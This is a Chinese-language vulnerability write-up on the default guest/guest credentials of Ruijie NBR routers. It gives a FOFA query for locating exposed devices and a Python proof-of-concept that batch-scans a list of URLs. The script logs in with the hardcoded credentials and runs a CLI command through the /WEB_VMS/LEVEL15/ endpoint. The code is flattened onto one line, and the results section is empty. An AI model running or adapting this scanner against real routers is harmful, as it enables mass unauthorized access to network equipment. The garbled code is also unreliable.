漏洞簡介
銳捷網絡股份有限公司是一家數據通信解決方案提供商。
銳捷網絡股份有限公司NBR路由器存在弱口令漏洞,攻擊者可利用該漏洞獲取敏感信息。
漏洞影響
NBR路由器
漏洞復現
百度上查詢到NBR路由器的默認賬號密碼為guest/guest
在NBR後台管理界面使用默認賬號密碼成功登錄後台
poc
import requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarning #消除警告requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # 消除警告import sysimport argparsedef lemonlove7():print('FOFA:title="銳捷網絡--NBR路由器--登錄界面"')print('python xxx.py -u/--url xxx.xxx.xxx.xxx')print('python xxx.py -f/--file xxx.txt')print('lemonlove7')if len(sys.argv) == 1:lemonlove7()sys.exit()par = argparse.ArgumentParser(description='lemonlove7 help')par.add_argument('-u','--url' ,help='輸入url',default='')par.add_argument('-f','--file',help='輸入文件',default='')a = par.parse_args()url =a.urlfile =a.fileheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36','Content-Type':'text/plain;charset=UTF-8','Cookie':'c_name=; hardtype=NBR2000G; web-coding=gb2312; currentURL=; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest','Authorization':'Basic Z3Vlc3Q6Z3Vlc3Q='}data = 'command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.'if url != '':url = urlurl2 =urltry:url1 =url+'/WEB_VMS/LEVEL15/'r =requests.post(url=url1 , data=data,headers=headers,verify=False,timeout=10)#print(r.text)if r.status_code == 200 and 'WebCLI' in r.text:print(url2+'NBR路由器存在弱口令:guest/guest')else:print(url2+'NBR路由器不存在弱口令')except Exception as e:print(url2+'異常')if file != '':p = open(file,'r+')for i in p.readlines():url = i.strip()if url.startswith('') != 1 and url.startswith('') != 1:url = ''+urlurl=urlurl1=url#print(url)try:url = url +'/WEB_VMS/LEVEL15/'r=requests.post(url=url,headers=headers,data=data,verify=False,timeout=10)if r.status_code == 200 and 'WebCLI' in r.text:print(url1+'NBR路由器存在弱口令:guest/guest')else:print(url1+'NBR路由器不存在弱口令')except Exception as e:print(url1+'異常')
運行效果如下:
單個檢測:
批量檢測: